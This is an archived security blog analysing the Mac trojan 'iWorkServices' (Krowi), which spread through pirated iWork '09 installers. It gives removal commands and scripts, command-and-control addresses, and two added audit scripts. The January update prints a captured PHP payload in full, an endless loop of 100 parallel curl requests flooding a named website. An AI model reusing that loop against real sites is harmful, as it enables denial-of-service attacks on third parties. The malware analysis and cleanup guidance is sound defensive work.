Archive for January, 2009

New Offer from Rogue “iMunizator”

Looks familiar? Yes, we saw this last January with “MacSweeper”, the first rogue application for the Mac. The authors tried to defend their application and fixed it, but the damage was already done. Months later, a rebranded version, “Imunizator”, came out. This week we have seen its update, along with its equally rogue “LifeTime” offers.

[screenshot: iMunizator]

[screenshot: the new “LifeTime” offer]

Latest OS X threat Krowi installs “DivX”

The latest update of the Krowi threat was found in an Adobe Photoshop cracker installer.

Not much difference from “iWorkServices” except for the repackaging and the name. However, this should serve as a reminder to be extra careful when downloading stuff!

[screenshot: strings from the Krowi binary]

Once installed, you’ll find the files and port activity shown below.

[screenshot: DivX files and port activity]

How to remove it? The steps are the same as in the previous instructions, except that you have to change the name from “iWorkServices” to “DivX”.

How To Remove “iWorkServices”

I noticed that some of the traffic coming in is looking for how to remove “iWorkServices”.

So, here are the manual, “Do It Yourself” steps:

Open Terminal –> /Applications/Utilities/Terminal.app

Check if “iWorkServices” is running; to do so, you can choose any of the options below:

**Note: These commands require root privileges to execute; to avoid re-entering your password every time, type –> “sudo su”.**

  1. Check for a running “iworkservices” process by typing “lsof -c iwork” or “lsof -c iWork”; just check which one works for you.

[screenshot: lsof output]

While monitoring the “iWorkServices” background activity, you will notice the TCP connections changing as it tries to communicate with 69.92.177.146:59201 and qwfojzlk.freehostia.com:1024.

[screenshot: lsof output showing the TCP connections]

  1.1 If you know the PID (process ID), typing “lsof -p <PID>” will give the same result.

  2. Since we have already confirmed the presence of this threat on the system, you can start removing it by executing the following commands:

            rm -rf /System/Library/StartupItems/iWorkServices
            rm /usr/bin/iWorkServices
            rm /private/tmp/.iWorkServices
            rm -rf /Library/Receipts/iWorkServices.pkg
            killall -9 iWorkServices

  2.1 Or you can copy the same instructions into a small bash script, as in the example below:

#!/bin/bash
# Simple script to delete the iWorkServices files and terminate the running process.
# Run it as root (sudo su), otherwise the rm and killall commands will fail.
rm -rf /System/Library/StartupItems/iWorkServices   # startup item (persistence)
rm /usr/bin/iWorkServices                           # the bot binary
rm /private/tmp/.iWorkServices                      # temp file related to its P2P activity
rm -rf /Library/Receipts/iWorkServices.pkg          # installer receipt kept by the system
killall -9 iWorkServices                            # terminate the running process
exit

You can write these instructions in any text editor, such as TextEdit (/Applications/TextEdit.app).

[screenshot: the script in TextEdit]

Open Terminal and type “chmod +rwx <filename>” as in the example below. **Notice that I am the root user here, so don’t forget to type “sudo su” so that your script will execute properly.**

[screenshot: chmod on the script]

Then execute it by typing “./<your_filename>.sh”. In this example, I am executing “./remove.sh”; please refer to the sequence below.
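As an added example that is not part of the original post, here is a read-only check script that looks for the artifacts listed in the steps above, for both the “iWorkServices” name and the rebranded “DivX” name, and reports a running process and its TCP sockets without deleting anything. The optional root argument (to scan a mounted disk image or a test tree instead of the live system) is my addition; the paths and names are the ones given in this post.

```bash
#!/bin/bash
# Added example, not part of the original post: a read-only check for the Krowi
# artifacts the post lists, for both the "iWorkServices" name and the rebranded
# "DivX" name (same paths, different name). It only reports; nothing is deleted.
# An optional root argument lets it run against a mounted disk image or a
# constructed test tree instead of the live system.

# Print every artifact path that exists under $2 (default /) for variant $1.
# Returns 0 when nothing was found, 1 when at least one artifact exists.
krowi_files_present() {
    local name="$1" root="${2:-/}" hit=0 p
    root="${root%/}"
    for p in "/System/Library/StartupItems/$name/StartupParameters.plist" \
             "/System/Library/StartupItems/$name/$name" \
             "/usr/bin/$name" \
             "/private/tmp/.$name" \
             "/Library/Receipts/$name.pkg"; do
        if [ -e "$root$p" ]; then
            echo "FOUND: $root$p"
            hit=1
        fi
    done
    return $hit
}

# Report a running process named $1 and its TCP sockets (lsof needs root to
# see another user's sockets). Returns 1 when the process is running.
krowi_process_present() {
    local name="$1" pids
    pids=$(pgrep -x "$name" 2>/dev/null) || return 0
    echo "RUNNING: $name (PID $pids)"
    # -a ANDs the selectors: only TCP sockets that belong to this command.
    command -v lsof >/dev/null 2>&1 && lsof -a -nP -c "$name" -iTCP 2>/dev/null
    return 1
}

# Scan both variant names; exit status 1 means something was found.
krowi_scan() {
    local root="${1:-/}" name status=0
    for name in iWorkServices DivX; do
        krowi_files_present "$name" "$root" || status=1
        krowi_process_present "$name" || status=1
    done
    [ "$status" -eq 0 ] && echo "No Krowi artifacts found under $root"
    return $status
}

krowi_scan "$@"
```

Run it as root (sudo bash krowi_check.sh) so the process and socket checks can see every user's processes; compare any listed sockets against the two addresses noted above.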
OK, for those who want to just “Click and Remove”, SecureMac provides a free clean-up tool that you can download directly from this link:

http://macscan.securemac.com/files/iWorkServicesTrojanRemovalTool.dmg

I have tested it and it is a good tool to do the job for you!

If these instructions work, I’ll be excited to hear your story. I am pleased and overwhelmed by how much feedback I received on my previous blog article “How to Remove MacAccess”. I hope this will be useful as well…

Please feel free to drop a message, hopefully with additional information such as:

  • How did you get infected? (Which website?)
  • Do you still have a copy of the application you installed? If yes, please send it to this email address: meths101 (at) optusnet (dot) com (dot) au, or just send me a link where I can download it.
  • Any unusual behavior found on your computer.

Happy Holidays!!! –> As of writing, it is a nice sunny “Australian day” today and I still feel sleepy from watching the Australian Open last night. It was fun, and an amazing crowd!

Top & Active

[screenshot: blog dashboard statistics]

Indeed this data speaks a thousand words!

Update: “iWorkServices” Not Just A Trojan

Let’s call the bad iWork “Krowi”.

So, the story starts when an OS X user downloads an iWork ’09 installation package with a serial key through BitTorrent.

[screenshot: contents of the extracted iWork09.zip]

Take note that Krowi is often found in a package “iWork09.zip” with a file size of 450.4MB. Upon extracting it, you’ll find NO “iWorkServices” here; instead, there is a main installation package named iWork09Trial.mpkg and an enticing serial.txt.

Upon inspecting the contents of “iWork09Trial.mpkg”, you’ll find the nasty Krowi “iWorkServices.pkg” piggybacking.

[screenshot: contents of iWork09Trial.mpkg]

The file “preflight” contains a one-line instruction, which executes the Mach-O binary “iworkservices”.
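As an added example (not from the original post), here is a small shell audit that lists every sub-package and every install-time script inside a bundle-style .mpkg directory before anything is installed, so that a piggybacking package and its one-line preflight are visible up front. The script names it searches for and the Contents/Resources layout are assumptions based on the bundle package format of that era; the sample package tree used in the test is constructed.

```bash
#!/bin/bash
# Added example, not from the original post: audit a downloaded bundle-style
# package (.pkg/.mpkg directory) before installing it. It lists every embedded
# sub-package and prints every install-time script found inside, so a
# piggybacking package and its one-line preflight show up before anything runs.
# Assumption: install scripts live anywhere under the bundle with these names.

# Print every .pkg/.mpkg bundle under $1, including nested ones.
pkg_list_bundles() {
    find "$1" -type d \( -name '*.pkg' -o -name '*.mpkg' \) | sort
}

# Print each install-time script (path, line count, then the body, indented).
# Returns 1 when at least one script was found, 0 when the package has none.
pkg_show_scripts() {
    local found=0 s scripts
    scripts=$(find "$1" -type f \( -name preflight -o -name postflight \
        -o -name preinstall -o -name postinstall \
        -o -name preupgrade -o -name postupgrade \) | sort)
    while IFS= read -r s; do
        [ -n "$s" ] || continue
        found=1
        printf '== %s (%s lines)\n' "$s" "$(wc -l < "$s" | tr -d ' ')"
        sed 's/^/    /' "$s"
    done <<EOF
$scripts
EOF
    return $found
}

# Full audit: bundles first, then scripts. Exit status 1 = read the scripts
# before you install.
pkg_audit() {
    echo "Packages in $1:"
    pkg_list_bundles "$1" | sed 's/^/    /'
    echo "Install-time scripts:"
    if pkg_show_scripts "$1"; then
        echo "    (none)"
        return 0
    fi
    return 1
}

# Usage: bash pkg_audit.sh /path/to/iWork09Trial.mpkg
[ "$#" -gt 0 ] && pkg_audit "$1"
```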

When installed, this will create the following files:

/System/Library/StartupItems/iWorkServices/StartupParameters.plist

/System/Library/StartupItems/iWorkServices/iWorkServices

/usr/bin/iWorkServices

Since the system keeps a copy of the installer, you’ll find this as well:

/Library/Receipts/iWorkServices.pkg

Once installed, you will find the “iWorkServices” process running in the background, and it will persistently attempt to report to its command and control channels:

69.92.177.146:59201

qwfojzlk.freehostia.com:1024


Krowi is a nasty P2P-controlled bot, similar to the well-known Storm Worm.

An infected OS X machine can be controlled remotely by the bot master. It can be used to participate in a massive Distributed Denial of Service (DDoS) attack, install further applications (like software from Pay-per-Install schemes), send spam, distribute malware, and may gather user data.

Looking further, this malware comes with a Lua interpreter, which is described as a “powerful, fast, light-weight, embeddable scripting language”. This could further expand the attacker’s capability on the affected machine. An automated master could respond and push a PHP script …

Imagine,  load and run!

++++++++++++++++

Update 24th Jan: I just want to link a few infection reports I found around the net that were able to capture PHP scripts running on their box:

http://notahat.com/posts/28 

http://macmagazine.com.br/forum/index.php?showtopic=12056&pid=58190&st=0&#entry58190 

The captured script, reformatted here for readability, is a plain PHP loop that opens 100 parallel curl requests to the same site, waits for them to finish, and starts over:

php while (1) {
    $mh = curl_multi_init();
    $ch = array();
    for ($i = 0; $i < 100; $i++) {
        $ch[$i] = curl_init();
        curl_setopt($ch[$i], CURLOPT_URL, "http://www.dollarcardmarketing.com");
        curl_setopt($ch[$i], CURLOPT_HEADER, 0);
        curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true);
        curl_multi_add_handle($mh, $ch[$i]);
    }
    do { curl_multi_exec($mh, $running); } while ($running > 0);
    for ($i = 0; $i < 100; $i++) { curl_multi_remove_handle($mh, $ch[$i]); }
    curl_multi_close($mh);
}

One of the reports also captured the process list, with the same one-liner running as root in five copies (the command column is abbreviated; it is the script above):

root 35113 32.4 0.2 88956 4952? R-r 10:02 1:54.60 php while (1) { ... }

root 35112 31.8 0.2 88956 4936? R-r 10:02 1:54.67 php while (1) { ... }

root 35064 31.2 0.2 88956 5048? R-r 10:00 4:00.37 php while (1) { ... }

root 35111 31.2 0.2 88956 4944? R-r 10:02 1:55.37 php while (1) { ... }

root 35100 31.1 0.2 88956 4952? R-r 10:02 2:00.98 php while (1) { ... }

Latest OS X Threat: “iWorkServices”

A new OS X threat disguised as the legitimate application iWork ’09 is currently in the wild. A few OS X users have already been tricked by this, so be careful!

This malicious piece of code creates a startup entry and copies itself to /usr/bin/iWorkServices.


Once installed, it will attempt to communicate remotely and execute HTTP requests. It will also create /tmp/.iWorkServices and set its mode to 755 (read and execute for everyone), which may relate to its P2P activity.

It also references “Users/jason/diarrhea/aes/aes_modes.c”.

Notice that it will also attempt to connect to this URL:

[screenshot: the URL the binary connects to]

OK, so the culprit is in Mach-O universal binary format:

[screenshot: file type output for the binary]

I know these details are not enough; for now I can say that this is indeed a threat: a backdoor, trojan and P2P-controlled bot.

**Updated: Note that the file size of the package that contains this threat is ~450MB.**

By the way, this is currently being discussed here:

http://thepiratebay.org/torrent/4630952/iWork.09

http://thepiratebay.org/torrent/4627720/iWork__09_Trial